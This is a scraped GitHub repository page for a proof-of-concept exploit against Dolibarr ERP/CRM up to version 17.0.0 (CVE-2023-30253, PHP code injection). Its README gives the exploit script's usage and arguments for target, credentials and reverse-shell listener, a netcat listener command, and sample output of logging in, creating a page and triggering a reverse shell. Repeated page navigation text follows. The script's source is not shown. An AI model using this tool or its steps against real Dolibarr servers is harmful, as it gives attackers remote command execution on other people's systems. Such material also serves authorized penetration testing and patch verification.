POC exploit for Dolibarr <= 17.0.0 (CVE-2023-30253)

Reverse Shell POC exploit for Dolibarr <= 17.0.0 (CVE-2023-30253), PHP Code Injection

See more details about the vulnerability here

PoC

Help of exploit:

➜  python3 exploit.py -h
usage: python3 exploit.py <TARGET_HOSTNAME> <USERNAME> <PASSWORD> <LHOST> <LPORT>
example: python3 exploit.py http://example.com login password 127.0.0.1 9001

---[Reverse Shell Exploit for Dolibarr <= 17.0.0 (CVE-2023-30253)]---

positional arguments:
  hostname    Target hostname
  username    Username of Dolibarr ERP/CRM
  password    Password of Dolibarr ERP/CRM
  lhost       Listening host for reverse shell
  lport       Listening port for reverse shell

options:
  -h, --help  show this help message and exit

Run the netcat on your host:

➜ nc -lvnp 9001

Run the exploit (example):

➜ python3 exploit.py http://example.com login passsword 127.0.0.1 9001
[*] Trying authentication...
[**] Login: login
[**] Password: password
[*] Trying created site...
[*] Trying created page...
[*] Trying editing page and call reverse shell... Press Ctrl+C after successful connection

Name		Name	Last commit message	Last commit date
Latest commit History 6 Commits
README.md		README.md
exploit.py		exploit.py

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

POC exploit for Dolibarr <= 17.0.0 (CVE-2023-30253)

PoC

About

Releases

Packages

Languages

nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253

Folders and files

Latest commit

History

Repository files navigation

POC exploit for Dolibarr <= 17.0.0 (CVE-2023-30253)

PoC

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages